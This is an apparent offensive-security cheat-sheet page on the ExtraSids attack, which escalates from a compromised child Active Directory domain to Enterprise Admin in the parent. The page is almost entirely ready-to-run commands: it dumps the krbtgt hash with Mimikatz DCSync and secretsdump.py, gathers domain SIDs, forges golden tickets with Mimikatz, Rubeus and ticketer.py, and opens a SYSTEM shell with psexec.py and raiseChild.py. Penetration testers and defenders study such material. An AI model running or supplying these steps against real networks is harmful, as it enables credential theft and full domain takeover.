Child -> Parent Trusts

Windows

ExtraSids Attack - Mimikatz

To perform this attack after compromising a child domain, we need the following:

  • The KRBTGT hash for the child domain

  • The SID for the child domain

  • The name of a target user in the child domain (does not need to exist!)

  • The FQDN of the child domain.

  • The SID of the Enterprise Admins group of the root domain.

  • With this data collected, the attack can be performed with Mimikatz.

# Obtaining the KRBTGT Account's NT Hash using Mimikatz, which also gives SID
PS C:\>  mimikatz # lsadump::dcsync /user:LOGISTICS\\krbtgt

# alternative to get SID using PowerView
Get-DomainSID

# Obtaining Enterprise Admins Group's SID using Get-DomainGroup from PowerView
Get-DomainGroup -Domain DOMAIN.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

# Or using cmdlet  
Get-ADGroup -Identity "Enterprise Admins" -Server "DOMAIN.LOCAL".

# Creating a Golden Ticket with Mimikatz
mimikatz # kerberos::golden /user:hacker /domain:CHILD.DOMAIN.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

# Checking if Golden ticket for non existant user hacker is residing in memory
klist

ExtraSids Attack - Rubeus

# Creating a Golden Ticket using Rubeus
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:CHILD.DOMAIN.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689  /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

Linux

# Performing DCSync with secretsdump.py
secretsdump.py child.domain.local/adm@ip -just-dc-user child/krbtgt

# Performing SID Brute Forcing using lookupsid.py
# to create their SID : DOMAIN_SID-RID
lookupsid.py child.domain.local/adm@ip

# Looking for the Domain SID
lookupsid.py child.domain.local/adm@ip | grep -B12 "Enterprise Admins"

# Constructing a Golden Ticket using ticketer.py
ticketer.py -nthash 9d7---5f -domain CHILD.DOMAIN.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

# Setting the KRB5CCNAME Environment Variable
export KRB5CCNAME=hacker.ccache

# Getting a SYSTEM shell using Impacket's psexec.py
psexec.py CHILD.DOMAIN.LOCAL/hacker@dc01.domain.local -k -no-pass -target-ip ip

OOORRR 
# Automating all of above 
# Performing the Attack with raiseChild.py
raiseChild.py -target-exec ip CHILD.DOMAIN.LOCAL/adm
PreviousEnumerating Trust RelationshipsNextCross-Forest Trust Abuse

Last updated